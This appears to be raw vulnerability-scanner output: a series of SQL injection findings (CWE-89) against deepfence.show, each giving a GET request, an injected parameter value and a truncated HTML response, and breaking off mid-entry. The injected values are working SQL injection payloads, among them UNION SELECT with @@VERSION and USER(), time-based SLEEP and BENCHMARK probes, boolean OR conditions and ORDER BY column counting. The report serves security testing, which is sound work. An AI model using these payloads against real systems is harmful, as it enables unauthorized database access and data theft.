href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1850Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1,2\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1851\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A'))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1852\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1853\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ')) or (('x'))=(('x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1854\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1855\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '&'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1856\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1857\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '\n%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1858\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1859\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1860\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 3409=3409 AND ('pytW' LIKE '\npytY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1861\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,1,1))='X'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1862\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# benchmark(50000000,MD5(1))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1863Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 3409=3409 AND ('pytW' LIKE '\npytW\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token 